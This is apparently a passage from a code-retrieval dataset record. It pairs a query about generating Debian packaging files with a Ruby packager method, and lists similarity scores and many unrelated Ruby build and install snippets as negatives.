"def package(output_dir = Pathname(Dir.pwd).expand_path)\n # Check the source\n check_source!\n # Turn the source into component parts to build a gem out of\n gem_parts = read_source_parts\n # Write these parts to a directory\n gem_dir = write_gem_dir(gem_parts)\n # Build a .gem file from this directory, and leave it in the `output_dir`\n build_package(gem_dir, output_dir)\n end",
"def run_package_command(cmd)\n if cmd.is_a?(Array)\n command = cmd[0]\n cmd_options.merge!(cmd[1])\n else\n command = cmd\n end\n\n shellout!(command, cwd: config.package_dir)\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/RYLabs/rails-devcontainer-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-devcontainer-template/(.+)/rails-postgres.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def run(remote = false, branch = 'master')\n if already_released?\n logger.fatal \"Version #{version} had already been released, did you bump the version manually?\"\n exit 1\n end\n File.write(changelog_file, new_content) unless remote\n id = commit_changelog(nil, remote, branch) if options[:commit]\n logger.info \"The changelog has been updated to version #{version}\"\n id\n end",
"def update_github\n unless environment_is_production\n puts 'NOT updating github because environment is not production'\n return false\n end\n\n puts 'pushing database to github'\n\n @scraper_log.info \"------------------------------\"\n @scraper_log.info \"updating git\"\n @scraper_log.info \"------------------------------\"\n x = Subexec.run \"git add #{@db_dump_file} #{@status_file_name}\"\n x = Subexec.run \"git commit -m 'Updated database dump file and status.json with new hr.gov.ge data'\"\n x = Subexec.run \"git push origin master\"\nend"
] | [
"0.7835676",
"0.64839965",
"0.5969037",
"0.5942226",
"0.5895876",
"0.58421993",
"0.5836047",
"0.5763407",
"0.57430965",
"0.57420176",
"0.56336474",
"0.55841255",
"0.5577395",
"0.55551475",
"0.55478275",
"0.5509306",
"0.54801506",
"0.54568374",
"0.54221076",
"0.53568935",
"0.5320292",
"0.53012246",
"0.52911866",
"0.5272126",
"0.52704924",
"0.52664596",
"0.5264678",
"0.5253686",
"0.52408135",
"0.52274716",
"0.5225195",
"0.52222216",
"0.51910114",
"0.51649463",
"0.5163986",
"0.5163906",
"0.5159945",
"0.51519954",
"0.51254153",
"0.51212865",
"0.5107526",
"0.5062604",
"0.50582314",
"0.50493026",
"0.5027674",
"0.5026496",
"0.5020084",
"0.5012091",
"0.49969897",
"0.49775195",
"0.49644232",
"0.49594262",
"0.49586478",
"0.49551764",
"0.49532193",
"0.49361262",
"0.49238154",
"0.49223223",
"0.49125284",
"0.49039868",
"0.49039868",
"0.48999023",
"0.48988232",
"0.48851907",
"0.48759314",
"0.48644456",
"0.48535353",
"0.4844647",
"0.48406643",
"0.48392317",
"0.48382595",
"0.48369414",
"0.4836931",
"0.48317817",
"0.48204598",
"0.4800055",
"0.47921088",
"0.47736108",
"0.47683573",
"0.47642",
"0.47533065",
"0.4752743",
"0.47494763",
"0.47447237",
"0.47426197",
"0.4733374",
"0.47305873",
"0.4727561",
"0.47162762",
"0.47159657",
"0.47141322",
"0.47094405",
"0.4708716",
"0.4707381",
"0.47072512",
"0.47042134",
"0.4703691",
"0.47017205",
"0.47005036",
"0.4698235"
] | 0.7725159 | 1 |
Generate the debian/ subfolder cindlugin control/rules/install files to prepare the debian package build instructions | def generate_debian_dir(pkginfo, dir, options)
options, unknown_options = Kernel.filter_options options,
:distribution => nil,
:override_existing => true,
:patch_dir => nil
distribution = options[:distribution]
# Prepare fields for template
package_info = pkginfo
debian_name = debian_name(pkginfo)
debian_version = debian_version(pkginfo, distribution)
versioned_name = versioned_name(pkginfo, distribution)
short_documentation = pkginfo.short_documentation
documentation = pkginfo.documentation
origin_information = pkginfo.origin_information
source_files = pkginfo.source_files
upstream_name = pkginfo.name
copyright = pkginfo.copyright
license = pkginfo.licenses
deps = @dep_manager.filtered_dependencies(pkginfo)
#debian names of rock packages
deps_rock_packages = deps[:rock]
deps_osdeps_packages = deps[:osdeps]
deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact
dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten
build_dependencies = dependencies.dup
this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)
@rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|
name = debian_name(pkginfo)
build_dependencies << this_rock_release.packageReleaseName(name)
end
# To handle postinstall
DEFAULT_BUILD_DEPENDENCIES.each do |dep|
build_dependencies << dep
end
DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|
dependencies << dep
end
if pkginfo.build_type == :cmake
build_dependencies << "cmake"
elsif pkginfo.build_type == :orogen
build_dependencies << "cmake"
orogen_command = pkginfo.orogen_command
elsif pkginfo.build_type == :autotools
if pkginfo.using_libtool
build_dependencies << "libtool"
end
build_dependencies << "autotools-dev" # as autotools seems to be virtual...
build_dependencies << "autoconf"
build_dependencies << "automake"
build_dependencies << "dh-autoreconf"
elsif pkginfo.build_type == :ruby
if pkginfo.is_bundle?
build_dependencies << "cmake"
else
raise "debian/control: cannot handle ruby package"
end
elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package
build_dependencies << "cmake"
else
raise "debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}"
end
Packager.info "Required OS Deps: #{deps_osdeps_packages}"
Packager.info "Required Nonnative Deps: #{deps_nonnative_packages}"
dir = cleanup_existing_dir(dir, options)
existing_debian_dir = File.join(pkginfo.srcdir,"debian")
template_dir =
if File.directory?(existing_debian_dir)
existing_debian_dir
else
TEMPLATES
end
FileUtils.mkdir_p dir
Find.find(template_dir) do |path|
next if File.directory?(path)
template = ERB.new(File.read(path), nil, "%<>", path.gsub(/[^w]/, '_'))
rendered = template.result(binding)
target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)
FileUtils.mkdir_p File.dirname(target_path)
File.open(target_path, "w") do |io|
io.write(rendered)
end
end
if options[:patch_dir]
whitelist = [ "debian/rules","debian/control","debian/install" ]
if patch_pkg_dir(pkginfo.name, options[:patch_dir],
whitelist: whitelist,
pkg_dir: pkginfo.srcdir,
options: patch_options())
Packager.warn "Overlay patch applied to debian folder of #{pkginfo.name}"
end
end
########################
# debian/compat
########################
compatfile = File.join(dir,"compat")
set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def install\n run \"bundle exec backup generate:config --config-path=config/backup\" unless File.exists?(\"config/backup/config.rb\")\n template \"general.rb\", \"config/backup/models/general.rb\"\n if File.exists? \".env\"\n append_file \".env\" do\n File.read(File.expand_path(find_in_source_paths('env.env')))\n end\n else\n template \"env.env\", \".env\"\n end\n run \"bundle exec wheneverize .\" unless File.exists?(\"config/schedule.rb\")\n append_file \"config/schedule.rb\" do\n File.read(File.expand_path(find_in_source_paths('schedule.rb')))\n end\n end",
"def install\n # # Changes log level to default value\n # inreplace \"etc/baetyl/conf.yml\" do |s|\n # s.gsub! \"level: debug\", \"\"\n # end\n\n bin.install Dir[\"bin/*\"]\n etc.install Dir[\"etc/*\"]\n end",
"def main\n generate_config unless $dont_gen_conf\n\n if $just_gen_conf\n puts \"\\nSkips installing, just generated the config file!\".pink\n exit(0)\n end\n \n install_dependencies if $install_req\n\n install_to_directory\nend",
"def install_management\n # Needed to play with the configuration database.\n package 'debconf'\n package 'debconf-utils'\n\n # Keys for Debian packages.\n package 'debian-archive-keyring'\n\n # Fetch files via HTTP.\n package 'curl'\n package 'wget'\n\n package 'dpkg-dev' # Builds packages from source.\n package 'openssh-server' # SSH into the box.\n\n # For gems with native extensions.\n package 'build-essential'\n package 'g++'\n\n # Pull code from version control.\n package 'subversion'\n package 'git-core'\n\n package 'avahi-daemon' # mDNS, a.k.a. Bonjour\n package 'ddclient' # dynamic DNS\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def install\n system \"python\", \"setup.py\", \"install\"\n\n # Make BUSCO read config.ini from current directory\n inreplace \"scripts/run_BUSCO.py\", \"BuscoConfig('%s/../config/config.ini' % os.path.dirname(os.path.realpath(__file__))\", \"BuscoConfig('config.ini'\"\n \n bin.install \"scripts/run_BUSCO.py\"\n bin.install \"scripts/generate_plot.py\"\n bin.install_symlink \"run_BUSCO.py\" => \"busco\"\n\n # Set correct directories in config template\n inreplace \"config/config.ini.default\", \"/usr/bin/\", \"/mnt/lustre/software/linuxbrew/colsa/bin/\"\n inreplace \"config/config.ini.default\", \"/home/osboxes/BUSCOVM/augustus/augustus-3.2.2/bin/\", \"/mnt/lustre/software/linuxbrew/colsa/bin/\"\n inreplace \"config/config.ini.default\", \"/home/osboxes/BUSCOVM/augustus/augustus-3.2.2/scripts/\", \"/mnt/lustre/software/linuxbrew/colsa/Cellar/augustus/3.2.2_2/libexec/scripts/\"\n inreplace \"config/config.ini.default\", \"/home/osboxes/BUSCOVM/hmmer/hmmer-3.1b2-linux-intel-ia32/binaries/\", \"/mnt/lustre/software/linuxbrew/colsa/bin/\"\n libexec.install Dir[\"config\"]\n doc.install \"BUSCO_v3_userguide.pdf\"\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def install\n# Dependency tracking only, uncomment this section only if you know what you\n# are doing!\n#\n# mkdir 'build'\n# cd 'build' do\n# system \"cmake .. #{std_cmake_parameters}\"\n# system \"make package\"\n# end\nend",
"def install\n copy_envrc\n copy_database_yml\n copy_docker_db_setup_sh\n system(`direnv allow`)\n print(\"#{readme}\\n\")\n end",
"def branded_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n var_dir = \"/var/tmp\"\n tmp_dir = options['clientdir']+\"/\"+var_dir\n post_file = tmp_dir+\"/postinstall.sh\"\n tmp_file = \"/tmp/zone_\"+options['name']\n pkg_name = \"pkgutil.pkg\"\n pkg_url = $local_opencsw_mirror+\"/\"+pkg_name\n pkg_file = tmp_dir+\"/\"+pkg_name\n wget_file(options,pkg_url,pkg_file)\n file = File.open(tmp_file,\"w\")\n file.write(\"#!/usr/bin/bash\\n\")\n file.write(\"\\n\")\n file.write(\"# Post install script\\n\")\n file.write(\"\\n\")\n file.write(\"cd #{var_dir} ; echo y |pkgadd -d pkgutil.pkg CSWpkgutil\\n\")\n file.write(\"export PATH=/opt/csw/bin:$PATH\\n\")\n file.write(\"pkutil -i CSWwget\\n\")\n file.write(\"\\n\")\n file.close\n message = \"Information:\\tCreating post install script \"+post_file\n command = \"cp #{tmp_file} #{post_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def setup_before_restart\n tcs_static = node['thecollegesound']['static_root']\n tcs_app = File.join(node['thecollegesound']['app_root'], 'current')\n\n # -- Link statics (css, js, basic images)\n # FIXME: Consolidate the image directories\n ['css', 'js', 'images', 'icons', 'img'].each do |dir|\n link \"#{tcs_static}/static/#{dir}\" do\n to \"#{tcs_app}/collegesound/static/#{dir}\"\n end\n end\n\n # -- Link templates\n link \"#{tcs_static}/templates\" do\n to \"#{tcs_app}/collegesound/templates\"\n end\n\n # -- Install the package\n bash 'install_package' do\n user 'root'\n cwd tcs_app\n code 'python setup.py install'\n end\n\n # -- Run migration\n bash 'run_migration' do\n user 'root'\n cwd \"#{tcs_app}/collegesound\"\n code <<-EOH\n python manage.py convert_to_south main\n python manage.py migrate main\n EOH\n end\nend",
"def install\n system \"make\", \"-f\", \"LINUX/Makefile\"\n bin.install 'xum1541cfg'\n end",
"def install\n end",
"def install\n end",
"def install_fake_pkg(name)\n require_relative 'ci-tooling/lib/dpkg'\n Dir.mktmpdir do |tmpdir|\n Dir.chdir(tmpdir) do\n FileUtils.mkpath(\"#{name}/DEBIAN\")\n File.write(\"#{name}/DEBIAN/control\", <<-EOF.gsub(/^\\s+/, ''))\n Package: #{name}\n Version: 999:999\n Architecture: all\n Maintainer: Harald Sitter <sitter@kde.org>\n Description: fake override package for kubuntu ci install checks\n EOF\n system(\"dpkg-deb -b #{name} #{name}.deb\")\n DPKG.dpkg(['-i', \"#{name}.deb\"])\n end\n end\nend",
"def pre_install; end",
"def prepare_for_installation; end",
"def install\n #python executable files\n end",
"def install\n \n end",
"def build_pkg(dist, arch, deps)\n start_dir = Dir.pwd\n build_dir = \"/tmp/rhobuild\"\n version = Rhoconnect::VERSION\n description = '\"Rhoconnect production environment\"'\n prefix = \"/opt/rhoconnect/installer\"\n gem_name = \"rhoconnect-#{version}.gem\"\n\n before_install_script = \"#{build_dir}/unix-like/pre_install.sh\"\n after_install_script = \"#{build_dir}/unix-like/post_install.sh\"\n before_remove_script = \"#{build_dir}/unix-like/pre_uninstall.sh\"\n after_remove_script = \"#{build_dir}/unix-like/post_uninstall.sh\"\n\n `rm -rf #{build_dir}` if File.exist?(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}/unix-like\")\n\n # Copy all necessary Files into the build_dir\n system(\"cp install.sh Gemfile Gemfile.lock #{build_dir}\")\n system(\"cp -r installer/unix-like/*.sh #{build_dir}/unix-like\")\n system(\"cp -r installer/unix-like/*.rb #{build_dir}/unix-like\")\n system(\"cp pkg/#{gem_name} #{build_dir}\")\n\n # cd into the pkg dir so that fpm will create the package into the pkg dir.\n Dir.chdir(\"./pkg\") # it created by build task and should already exist\n\n # Construct fpm command\n fpm_cmd = \"fpm -s dir -t #{dist} -n rhoconnect -v #{version} -a #{arch} -C #{build_dir} --epoch 1 \" +\n \"--before-install #{before_install_script} --after-install #{after_install_script} \" +\n \"--before-remove #{before_remove_script} --after-remove #{after_remove_script} \" +\n \"--prefix #{prefix} --description #{description}\"\n # Add the list of dependencies to the fpm call\n deps.each { |dep| fpm_cmd << \" -d '#{dep}'\" }\n fpm_cmd << \" './'\"\n # Create the package\n system(fpm_cmd)\n # Leave no trace...\n system(\"rm -rf #{build_dir}\")\n Dir.chdir(start_dir)\nend",
"def install_plugins\n download_plugins\n generate_goodies_includes\nend",
"def install\n # Fix build per Makefile instructions\n inreplace \"Makefile\", \"-static\", \"\"\n\n system \"make\"\n bin.install \"muscle\"\n end",
"def install\n end",
"def generate_pkg_contents\n shellout!(\"pkgsend generate #{source_dir} | pkgfmt > #{pkg_manifest_file}.1\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.1 #{pkg_metadata_file} #{transform_file} | pkgfmt > #{pkg_manifest_file}.2\")\n end",
"def cfn_template_cdk\n Dir.chdir(cfn_cdk_dir) do\n %x[npm run build]\n %x[cdk synth]\n end\n end",
"def build\n safesystem \"autoreconf -vfi\"\n configure :prefix => prefix\n make\n end",
"def prepare_config_files\n #Create .config dir\n #Create tucotuco dir\n #Create short dir\n #Create info file\n end",
"def post_install; end",
"def configureInstall\n Dir.chdir(\"nagios-4.0.4\")\n `./configure --with-command-group=nagcmd`\n `make all`\n `make install`\n `make install-init`\n `make install-config`\n `make install-commandmode`\n `make install-webconf`\n end",
"def install\n\tsystem \"make\"\n end",
"def install\n system \"python\", \"setup.py\", \"install\", \"--prefix=#{prefix}\"\n system \"make\", \"man\"\n man1.install gzip(\"cvs2svn.1\", \"cvs2git.1\", \"cvs2bzr.1\")\n prefix.install %w[ BUGS COMMITTERS HACKING\n cvs2bzr-example.options\n cvs2git-example.options\n cvs2hg-example.options\n cvs2svn-example.options contrib ]\n doc.install Dir[\"{doc,www}/*\"]\n end",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def install\n cd(@project_name) do\n puts `rake db:automigrate`\n puts `rake action=\"all\" dev:gen:view`\n puts `thor merb:gem:install`\n puts `bin/rake doc:diagrams`\n end\n end",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend",
"def prepare\n FileUtils.mkdir_p(veewee_autoyast_dir) unless veewee_autoyast_dir.directory?\n FileUtils.cp(sources_dir.join(\"postinstall.sh\"), veewee_autoyast_dir)\n end",
"def pkg_default_install\n bsdstyle = @bsdstyle\n make = @make\n sudo_cmd = ''\n\n if bsdstyle == true\n sudo_cmd = 'sudo'\n end\n if make.length == 0\n make = $bsyscfg.get_make\n end\n\n <<INSTALL\n#{sudo_cmd} #{make} DESTDIR=#{$project_rootdir}/ install\nINSTALL\n end",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def define\n desc \"Create Ruby on Rails plug-in package\"\n task :rails_plugin do\n @dest = \"#@package_dir/#{@name}_#{@version}\"\n makedirs(@dest,:verbose=>false)\n @plugin_files.each do |fn|\n cp(fn, @dest,:verbose=>false)\n add_file(File.basename(fn))\n end\n \n @package_files.each do |fn|\n puts \". #{fn}\" if verbose\n f = File.join(@dest, fn)\n fdir = File.dirname(f)\n unless File.exist?(fdir)\n mkdir_p(fdir,:verbose=>false)\n add_folder(\"#{fdir}/\")\n end\n if File.directory?(fn)\n mkdir_p(f,:verbose=>false)\n add_folder(\"#{fn}/\")\n else\n cp(fn, f, :verbose=>false)\n add_file(fn)\n end\n end\n \n generate_index_files()\n end\n end",
"def _install\n args = Array.new\n # If the project contains a makefile, it is a candidate for a derivative build.\n # In such case, protect 'libraries', 'modules' and 'themes' subdirectories\n # from deletion.\n if component.makefile\n args << '-f' << 'P /libraries/***' # this syntax requires rsync >=2.6.7.\n args << '-f' << 'P /modules/***'\n args << '-f' << 'P /profiles/***'\n args << '-f' << 'P /themes/***'\n end\n if component.drupal?\n args = Array.new\n args << '-f' << 'R /profiles/default/***' # D6\n args << '-f' << 'R /profiles/minimal/***' # D7\n args << '-f' << 'R /profiles/standard/***' # D7\n args << '-f' << 'R /profiles/testing/***' # D7\n args << '-f' << 'P /profiles/***'\n args << '-f' << 'R /sites/all/README.txt'\n args << '-f' << 'R /sites/default/default.settings.php'\n args << '-f' << 'P /sites/***'\n end\n args << '-a'\n args << '--delete'\n component.ignore_paths.each { |p| args << \"--exclude=#{p}\" }\n dst_path = platform.local_path + platform.dest_path(component)\n dont_debug { dst_path.mkpath }\n args << component.local_path.to_s + '/'\n args << dst_path.to_s + '/'\n begin\n runBabyRun 'rsync', args\n rescue => ex\n odie \"Installing or updating #{component.name} failed: #{ex}\"\n end\n end",
"def post_install\n end",
"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def generate_packaging_artifacts(workdir, name, binding, project)\n [\"pkginfo\", \"depend\", \"preinstall\", \"preremove\", \"postinstall\", \"proto\"].each do |template|\n target_dir = File.join(workdir, 'packaging')\n FileUtils.mkdir_p(target_dir)\n erb_file(File.join(VANAGON_ROOT, \"resources/solaris/10/#{template}.erb\"), File.join(target_dir, template), false, { :binding => binding })\n end\n end",
"def call\n INSTALL_DIRS.each do |dir|\n FileUtils.mkdir_p Karafka.root.join(dir)\n end\n\n INSTALL_FILES_MAP.each do |source, target|\n target = Karafka.root.join(target)\n next if File.exist?(target)\n\n source = Karafka.core_root.join(\"templates/#{source}\")\n FileUtils.cp_r(source, target)\n end\n end",
"def install\n # nothing to do\n end",
"def install\n ENV[\"XML_CATALOG_FILES\"] = etc/\"xml/catalog\"\n system \"autoreconf\", \"--force\", \"--install\", \"--verbose\" if build.head?\n system \"./configure\", *std_configure_args,\n \"--disable-silent-rules\",\n \"--disable-video\",\n \"--without-python\",\n \"--without-qt\",\n \"--without-gtk\",\n \"--without-x\"\n system \"make\", \"install\"\n end",
"def install\n self.run_preseed if @resource[:responsefile]\n should = @resource[:ensure]\n\n checkforcdrom\n cmd = %w{-q -y}\n\n keep = \"\"\n if config = @resource[:configfiles]\n if config == :keep\n cmd << \"-o\" << 'DPkg::Options::=--force-confold'\n else\n cmd << \"-o\" << 'DPkg::Options::=--force-confnew'\n end\n end\n\n str = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version and --force-yes option\n str += \"=#{should}\"\n cmd << \"--force-yes\"\n end\n\n cmd << :install << str\n\n aptget(*cmd)\n end",
"def define\n desc \"Create Rails plug-in package\"\n task :rails_plugin do\n @dest = \"#@package_dir/#{@name}_#{@version}\"\n makedirs(@dest,:verbose=>false)\n @plugin_files.each do |fn|\n cp(fn, @dest,:verbose=>false)\n add_file(File.basename(fn))\n end\n\n @package_files.each do |fn|\n puts \". #{fn}\" if verbose\n f = File.join(@dest, fn)\n fdir = File.dirname(f)\n unless File.exist?(fdir)\n mkdir_p(fdir,:verbose=>false)\n add_folder(\"#{fdir}/\")\n end\n if File.directory?(fn)\n mkdir_p(f,:verbose=>false)\n add_folder(\"#{fn}/\")\n else\n cp(fn, f, :verbose=>false)\n add_file(fn)\n end\n end\n\n generate_index_files()\n end\n end",
"def installPackages\n Dir.chdir(\"/tmp\")\n `wget http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz`\n `wget http://garr.dl.sourceforge.net/project/nagios/nrpe-2.x/nrpe-2.15/nrpe-2.15.tar.gz`\n `tar -zxf nagios-plugins-1.5.tar.gz`\n `tar -zxf nrpe-2.15.tar.gz`\n Dir.chdir(\"nagios-plugins-1.5\")\n `./configure`\n `make`\n `make install`\n `chown nagios.nagios /usr/local/nagios`\n `chown -R nagios.nagios /usr/local/nagios/libexec`\n Dir.chdir(\"../nrpe-2.15\")\n `./configure`\n `make all`\n `make install-plugin`\n `make install-daemon`\n `make install-daemon-config`\n `make install-xinetd`\n end",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def install_custom!\n package package_name do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n end",
"def make_pkg\n with_src_dir do\n if @tool == 'sbt'\n msg \"Updating Kafka\"\n exec './sbt update'\n msg \"Building Kafka\"\n exec './sbt package'\n #exec './sbt assembly-package-dependency'\n exec './sbt release-tar'\n else\n msg \"Using gradle\"\n exec './gradlew clean'\n exec './gradlew releaseTarGz'\n end\n end\n rel_dir = \"#{@src_dir}/target/RELEASE/kafka_*\"\n source_jar = expand \"#{rel_dir}/kafka_*.jar\"\n cp source_jar, \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/libs\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/config\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/bin\", \"#{@workdir}/usr/lib/kafka\"\n\n build_pkg\n end",
"def build\n cd_and_sh( pkg_dir, build_commands )\n end",
"def install\n template 'Guardfile'\n end",
